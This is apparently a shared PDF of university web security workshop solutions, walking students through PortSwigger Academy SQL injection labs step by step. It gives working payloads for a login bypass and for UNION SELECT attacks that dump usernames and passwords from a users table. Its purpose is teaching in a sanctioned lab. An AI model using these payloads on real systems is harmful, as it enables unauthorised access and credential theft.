Workshop Week 4 - solutions PDF

Title Workshop Week 4 - solutions
Course Web security
Institution University of Melbourne
Pages 3
File Size 135.2 KB
File Type PDF
Total Downloads 87
Total Views 139
Preview
CLICK TO PREVIEW PDF
Summary

tutorial 4...

Description

School of Computing and Information Systems CO COMP MP MP9 90074: Web Security Workshop Week 4 1. Introduction For the purpose of this workshop, we will be learning from challenges within PortSwigger Academy. PortSwigger Academy provides a range of simple to difficult challenges. Today, we will be exploiting SQL injection challenges. We will be exploiting all these issues with Burp Suite.

2. PortSwigger Academy Register for a PortSwigger Academy account at the URL below (and log in afterwards): https://portswigger.net/users Note: Do not share your credentials with anyone. PortSwigger Academy creates a separate instance per user, per challenge, so do not share the domains you have been allocated either.

3. SQL Injection to Bypass Authentication Attempt to bypass the authentication at: https://portswigger.net/web-security/sql-injection/lab-login-bypass

4. Authentication Bypass: Solution Follow the following steps: 1. Access the lab 2. Click ‘Account login’ 3. Enter the following as the username: administrator'-4. Enter asdf as the password 5. Observe that we have authenticated into the application as the administrator user

5. SQL Injection to Add Your Own Item Challenge can be found at: https://portswigger.net/web-security/sql-injection/union-attacks/lab-find-column-containing-text For this challenge, we are going to use a SQL injection to add our own item into the shop (using union select). The final output should look similar to the image below:

6. SQL Injection to Add Your Own Item: Solution Follow the following steps: 1. Access the lab 2. Click on a category 3. Attempt to find the number of columns using: https://.web-security-academy.net/filter?category=Lifestyle%27+union+select+null-4. You will get a server error. This error is caused due to the mismatch of the number of columns within the SQL query. Increase the number of null statements until you no longer get an error: https://.web-securityacademy.net/filter?category=Lifestyle%27+union+select+1,%27hacker%27,133700--

7. SQL Injection to Retrieve Data From Other Tables Retrieve all usernames and passwords from the users table and log in as the administrator at: https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-data-from-othertables

8. SQL Injection to Retrieve Data From Other Tables: Solution Follow the following steps: 1. 2. 3. 4. 5. 6. 7. 8. 9.

Access the lab Click on a category Attempt to find the number of columns using the skills you learnt in the previous challenge Observe adding this payload to the end of URL works, signifying two columns in the original query: %27 UNION SELECT NULL,NULL-Determine which columns can contain text by replacing each NULL in turn with a string Observe both columns contain text, with the following payload appearing on the page: %27 UNION SELECT %27abc%27, %27def%27-Next use the following payload to leak the target columns from the target table: %27 UNION SELECT username, password FROM users-Observe the credentials have been leaked and are displayed on the page Grab the administrator credentials and log in

9. SQL Injection to Retrieve Multiple Values in a Single Column Retrieve all usernames and passwords from the users table and log in as the administrator at: https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-multiple-values-insingle-column

10. SQL Injection to Retrieve Multiple Values in a Single Column: Solution Follow the following steps: 1. 2. 3. 4. 5. 6. 7. 8. 9.

11.

Access the lab Click on a category Attempt to find the number of columns using the skills you learnt in the previous challenges Observe adding this payload to the end of URL works, signifying two columns in the original query: %27 UNION SELECT NULL,NULL-Determine which columns can contain text by replacing each NULL in turn with a string Observe only the second column contain text, with the following payload appearing on the page: %27 UNION SELECT NULL, %27def%27-Next use the following payload to leak the target columns in a single column from the target table: %27 UNION SELECT NULL,CONCAT(username, %27 %27, password) FROM users-Observe the credentials have been leaked and are displayed on the page Grab the administrator credentials and log in

Further reading

For further reading, and excelling at SQL injection attacks, complete the SQL injection labs in https://portswigger.net/web-security/all-labs. Note that these labs will be quite difficult but will improve your technical skills very quickly....

Similar Free PDFs
Workshop Week 4 - solutions
  • 3 Pages
Workshop WEEK 11 Solutions
  • 4 Pages
Pan workshop 4 solutions
  • 5 Pages
[Solution] Week 4 Workshop Problems
  • 5 Pages
ACC3TAX Week 10 Suggested Workshop Solutions
  • 5 Pages
Solutions to week 3 workshop questions
  • 4 Pages
Week 4 solutions - week 4 solution
  • 5 Pages
Week 4 solutions summer
  • 7 Pages
Week 4 Tutorial Solutions
  • 2 Pages
MKTG 3012 Week 4 Pre-workshop activity
  • 1 Pages
Workshop solutions leases
  • 30 Pages
Workshop week 4 - in class assignment
  • 3 Pages
Week 5 Workshop
  • 4 Pages
Week 5 Workshop Problems
  • 2 Pages
3101AFE Workshop 6 solutions
  • 3 Pages
workshop 1 solutions
  • 3 Pages
Popular Institutions